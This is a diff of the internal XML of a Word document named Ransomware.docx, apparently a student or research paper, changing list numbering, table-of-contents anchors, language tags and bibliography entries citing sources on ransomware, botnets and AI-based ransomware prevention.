+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04020003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04020005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04020001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04020003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04020005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48716B86"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="84CC0C2A"/>
@@ -10392,7 +11152,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5751104B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="865AD2D2"/>
@@ -10481,7 +11241,120 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="64210C10"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="FFD65806"/>
+    <w:lvl w:ilvl="0" w:tplc="04020001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04020003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04020005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04020001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04020003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04020005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04020001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04020003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04020005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6FD929C1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="383A7A92"/>
@@ -10594,7 +11467,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="71FF1552"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="62A247CA"/>
@@ -10707,7 +11580,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7235233B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="82E8934C"/>
@@ -10794,7 +11667,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="797143732">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="646785427">
     <w:abstractNumId w:val="1"/>
@@ -10803,19 +11676,25 @@
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="892738569">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1113406297">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1349334172">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1281380356">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="511453526">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="201987702">
     <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="774909101">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>
@@ -11430,7 +12309,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -12274,6 +13152,15 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
+</file>
+
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x010100EA7F95447AE5CD4A96E24D58484FA3D2" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="152a1f3b266b5df558eb501d08fa54b7">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xmlns:ns4="c5dcd230-26b3-4f1e-a7d8-2c2a40be033b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="ebbaa98d623378dfae11ad7cf338cc80" ns3:_="" ns4:_="">
     <xsd:import namespace="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
@@ -12468,15 +13355,6 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
 <file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
   <documentManagement>
@@ -12526,24 +13404,6 @@
     <b:Day>09</b:Day>
     <b:URL>https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/history-of-ransomware/</b:URL>
     <b:RefOrder>3</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Bot</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{20B2E95D-A0FA-4944-85FB-E71D64664F65}</b:Guid>
-    <b:Title>Botnet</b:Title>
-    <b:ProductionCompany>Eset</b:ProductionCompany>
-    <b:URL>https://help.eset.com/glossary/bg-BG/botnet.html</b:URL>
-    <b:RefOrder>10</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>CCS</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{F37D6060-4B83-48F8-ADC6-94648278B6D6}</b:Guid>
-    <b:Title>CC Server</b:Title>
-    <b:ProductionCompany>Eset</b:ProductionCompany>
-    <b:URL>https://help.eset.com/glossary/bg-BG/cc_server.html</b:URL>
-    <b:RefOrder>11</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>Фил20</b:Tag>
@@ -12627,12 +13487,51 @@
       </b:Author>
     </b:Author>
     <b:URL>https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</b:URL>
+    <b:RefOrder>11</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Bre25</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{3DCF498A-E77B-4961-A5CD-77D2C318EE76}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Robb</b:Last>
+            <b:First>Brenda</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>AI and Ransomware Prevention: How Smart Tech can Outsmart Cybercriminals</b:Title>
+    <b:ProductionCompany>BlackFog</b:ProductionCompany>
+    <b:Year>2025</b:Year>
+    <b:Month>06</b:Month>
+    <b:Day>24</b:Day>
+    <b:URL>https://www.blackfog.com/ai-and-ransomware-prevention-how-smart-tech-can-outsmart-cybercriminals</b:URL>
     <b:RefOrder>9</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Spr</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{4BD5D5E2-11B2-43B8-8295-F956C5FB1705}</b:Guid>
+    <b:Title>Spring Security Crypto Module</b:Title>
+    <b:ProductionCompany>Spring</b:ProductionCompany>
+    <b:URL>https://docs.spring.io/spring-security/reference/features/integrations/cryptography.html</b:URL>
+    <b:RefOrder>10</b:RefOrder>
   </b:Source>
 </b:Sources>
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EC25E0E9-ED1E-4DED-B1D8-B99F35F6AB52}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -12651,14 +13550,6 @@
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
 <file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
   <ds:schemaRefs>
@@ -12670,7 +13561,7 @@
 </file>
 
 <file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EF2CBA0C-06DA-4F41-AA0E-A73FE5799207}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1B5A900D-9C4B-489C-9127-E3B977EAB9EC}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -591,7 +591,7 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -603,7 +603,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc223468464" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545520" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -631,7 +631,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468464 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545520 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -671,10 +671,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468465" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545521" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -709,7 +709,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468465 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545521 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -749,10 +749,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468466" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545522" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -787,7 +787,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468466 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545522 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -828,10 +828,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468467" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545523" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -843,7 +843,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -881,7 +881,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468467 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545523 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -922,10 +922,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468468" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545524" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -937,7 +937,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -990,7 +990,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468468 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545524 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1031,10 +1031,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468469" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545525" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1047,7 +1047,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1078,7 +1078,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468469 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545525 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1119,10 +1119,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468470" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545526" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1135,7 +1135,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1188,7 +1188,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468470 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545526 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1229,10 +1229,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468471" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545527" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1244,7 +1244,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1290,7 +1290,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468471 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545527 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1330,10 +1330,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468472" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545528" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1390,7 +1390,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468472 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545528 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1430,10 +1430,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468473" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545529" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1468,7 +1468,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468473 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545529 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1508,10 +1508,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468474" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545530" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1546,7 +1546,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468474 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545530 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1586,10 +1586,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468475" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545531" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1616,7 +1616,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468475 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545531 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1656,10 +1656,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
